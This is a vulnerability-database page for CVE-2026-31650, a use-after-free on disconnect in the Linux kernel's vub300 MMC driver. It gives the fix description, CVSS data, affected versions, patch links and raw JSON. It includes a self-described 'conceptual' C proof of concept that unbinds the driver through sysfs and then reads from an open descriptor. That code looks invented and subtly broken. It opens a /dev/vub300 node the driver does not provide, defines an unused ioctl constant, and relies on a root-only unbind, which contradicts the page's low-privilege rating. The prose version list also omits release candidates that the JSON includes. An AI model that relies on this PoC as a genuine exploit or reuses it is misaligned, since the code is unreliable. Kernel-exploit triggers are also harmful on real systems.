Security Vulnerability Report
CVE-2026-31650 CVSS 7.8 HIGH

CVE-2026-31650

Published: 2026-04-24 15:16:44
Last Modified: 2026-04-27 20:14:35
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

mmc: vub300: fix use-after-free on disconnect

The vub300 driver maintains an explicit reference count for the controller and its driver data and the last reference can in theory be dropped after the driver has been unbound.

This specifically means that the controller allocation must not be device managed as that can lead to use-after-free.

Note that the lifetime is currently also incorrectly tied to the parent USB device rather than interface, which can lead to memory leaks if the driver is unbound without its device being physically disconnected (e.g. on probe deferral).

Fix both issues by reverting to non-managed allocation of the controller.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

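cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.17.1 up to, but not including, 6.18.23) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (versions from 6.19 up to, but not including, 6.19.13) - VULNERABLE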
cpe:2.3:o:linux:linux_kernel:6.17:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel (for the specific affected versions, refer to the versions prior to Git commits 8f4d20a, ea7468f, ef0448c)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * PoC for CVE-2026-31650 (Conceptual)
 * This PoC demonstrates the trigger condition for the use-after-free.
 * Requires a system with the vub300 hardware and vulnerable kernel.
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define VUB300_IOCTL_MAGIC 0x92

int main(void)
{
    // Step 1: Open the device to increment reference count
    int fd = open("/dev/vub300", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }
    printf("Device opened. Reference count incremented.\n");

    // Step 2: Simulate the unbind operation (usually requires root or specific sysfs access)
    // In a real exploit scenario, race condition is triggered here.
    // Writing to /sys/bus/usb/drivers/vub300/unbind
    FILE *unbind_fp = fopen("/sys/bus/usb/drivers/vub300/unbind", "w");
    if (unbind_fp) {
        // Assume interface ID is known
        fprintf(unbind_fp, "1-1:1.0");
        fclose(unbind_fp);
        printf("Driver unbind triggered.\n");
    }

    // Step 3: If UAF exists, accessing 'fd' now may crash the kernel
    // or allow memory corruption.
    char buffer[64];
    ssize_t bytes_read = read(fd, buffer, sizeof(buffer));
    if (bytes_read < 0) {
        perror("Use-after-free triggered or device gone");
    } else {
        printf("Read %zd bytes. System may still be vulnerable or patched.\n", bytes_read);
    }

    close(fd);
    return 0;
}

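References

https://git.kernel.org/stable/c/8f4d20a710225ec7a565f6a0459862d3b1f32330 (Patch)
https://git.kernel.org/stable/c/ea7468f61be033f4e18b95f2912010ed1d175d75 (Patch)
https://git.kernel.org/stable/c/ef0448c569b37ceabdd038e9faa311e5179127b0 (Patch)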

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31650", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:44.473", "lastModified": "2026-04-27T20:14:35.180", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmmc: vub300: fix use-after-free on disconnect\n\nThe vub300 driver maintains an explicit reference count for the\ncontroller and its driver data and the last reference can in theory be\ndropped after the driver has been unbound.\n\nThis specifically means that the controller allocation must not be\ndevice managed as that can lead to use-after-free.\n\nNote that the lifetime is currently also incorrectly tied the parent USB\ndevice rather than interface, which can lead to memory leaks if the\ndriver is unbound without its device being physically disconnected (e.g.\non probe deferral).\n\nFix both issues by reverting to non-managed allocation of the controller."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.1", "versionEndExcluding": "6.18.23", "matchCriteriaId": "0DC92196-2D7B-4F07-A19F-B43E0624C441"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "6.19", "versionEndExcluding": "6.19.13", "matchCriteriaId": "1490EF9B-9080-481C-8D22-1306AAE664E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.17:-:*:*:*:*:*:*", "matchCriteriaId": "7CC8B11D-82DC-4958-8DC7-BF5CC829A5E9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/8f4d20a710225ec7a565f6a0459862d3b1f32330", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ea7468f61be033f4e18b95f2912010ed1d175d75", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ef0448c569b37ceabdd038e9faa311e5179127b0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}